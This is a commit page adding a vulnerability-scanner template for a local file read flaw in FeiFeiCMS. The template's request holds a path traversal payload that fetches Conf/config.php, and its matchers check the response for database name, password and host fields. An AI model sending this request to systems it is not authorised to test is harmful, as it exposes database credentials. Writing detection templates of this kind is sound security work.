Create feifeicms-lfr.yaml

patch-1
Prince Chaddha 2021-04-07 19:54:35 +05:30 committed by GitHub
parent 314bb011a4
commit 797098e7fc
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions

View File

@ -0,0 +1,26 @@
id: feifeicms-lfr
info:
name: Feifeicms Local File Read
author: princechaddha
severity: high
tags: feifeicms,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?s=Admin-Data-down&id=../../Conf/config.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<?php"
- "db_name"
- "db_pwd"
- "db_host"
condition: and
part: body